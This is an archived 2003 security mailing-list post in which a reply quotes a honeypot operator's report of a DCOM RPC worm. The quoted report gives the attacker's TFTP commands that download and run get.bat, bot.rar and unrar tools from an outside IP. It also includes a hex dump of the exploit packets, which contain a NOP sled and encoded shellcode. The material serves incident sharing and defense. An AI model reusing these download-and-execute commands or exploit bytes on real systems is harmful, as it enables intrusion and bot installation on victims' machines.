Re: DCOM worm with get.bat bot.rar
From: Jeremiah Cornelius (jeremiah_at_nur.net)
Date: 08/19/03
- Previous message: Bruce Martins: "RE: Increasing ICMP Echo Requests"
- In reply to: Andrej: "DCOM worm with get.bat bot.rar"
- Next in thread: Peter Ellison: "RE: DCOM worm with get.bat bot.rar"
- Reply: Peter Ellison: "RE: DCOM worm with get.bat bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <incidents@securityfocus.com> Date: Tue, 19 Aug 2003 10:35:26 -0700
The address is a NTL ip in North UK. Likely a DSL there. Looks like it's
been unplugged, or DoSsd by tftp!
----- Original Message -----
From: "Andrej" <laj@swordlord.com>
To: <incidents@securityfocus.com>
Sent: Tuesday, August 19, 2003 2:05 AM
Subject: DCOM worm with get.bat bot.rar
> I just got a new DCOM worm on our honeypot. After the exploit on port 135
> (dump below) a connection was built on port 4444:
> TFTP -i 81.103.7.66 GET get.bat
> get.bat
> exit
> I was able to get the get.bat it's:
> mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
> TFTP -i 81.103.7.66 GET bot.rar
> TFTP -i 81.103.7.66 GET unrar.bat
> TFTP -i 81.103.7.66 GET unrar.exe
> start unrar.bat
> exit
> unfortunately I was not able to download the bot.rar for inspection
because
> the connection timed out. Maybe somebody else is more successful
>
> cheers
> andrej
>
>
>
> [2003-08-19 10:37:34]
> IPv4: 81.103.7.66 -> *
> hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
> chksum=43601
> TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
> ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
> Payload: length = 1460
>
> 000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
> 010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
> 020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
> 030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
> 040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
> 050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
> 060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
> 070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
> 080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
> 090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
> 0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
> 0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
> 0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
> 0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
> 0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
> 100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
> 110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
> 170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
> 180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
> 190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
> 1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
> 1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
> 200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
> 210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
> 220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
> 230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
> 240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
> 250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
> 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
> 280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
> 290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
> 2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
> 2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
> 2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
> 2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
> 2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
> 2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
> 300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
> 310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
> 320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
> 330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
> 350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
> 360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
> 370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
> 380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
> 390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
> 3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
> 450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
> 460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
> 470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
> 480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
> 490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
> 4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
> 4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
> 4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
> 4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
> 4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
> 4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
> 500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
> 510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
> 520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
> 530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
> 540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
> 550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
> 560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
> 570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
> 580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
> 590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
> 5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
> 5b0 : 77 65 6B D6 wek.
>
>
> [2003-08-19 10:37:34]
> IPv4: 81.103.7.66 -> *
> hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
> chksum=44816
> TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
> ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
> Payload: length = 244
>
> 000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
> 010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
> 020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
> 030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
> 040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
> 050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
> 060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
> 070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
> 080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
> 090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
> 0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
> 0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
> 0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
> 0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
> 0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
> 0f0 : 00 00 00 00 ....
>
> --------------------------------------------------------------------------
-
> Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
> - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
> - Automatically Control P2P, IM and Spam Traffic
> - Ensure Reliable Performance of Mission Critical Applications
> - Precisely Define and Implement Network Security and Performance
Policies
> **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
> Visit us at:
> http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
> --------------------------------------------------------------------------
-- > > --------------------------------------------------------------------------- Captus Networks - Integrated Intrusion Prevention and Traffic Shaping - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans - Automatically Control P2P, IM and Spam Traffic - Ensure Reliable Performance of Mission Critical Applications - Precisely Define and Implement Network Security and Performance Policies **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814 ----------------------------------------------------------------------------
- Previous message: Bruce Martins: "RE: Increasing ICMP Echo Requests"
- In reply to: Andrej: "DCOM worm with get.bat bot.rar"
- Next in thread: Peter Ellison: "RE: DCOM worm with get.bat bot.rar"
- Reply: Peter Ellison: "RE: DCOM worm with get.bat bot.rar"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
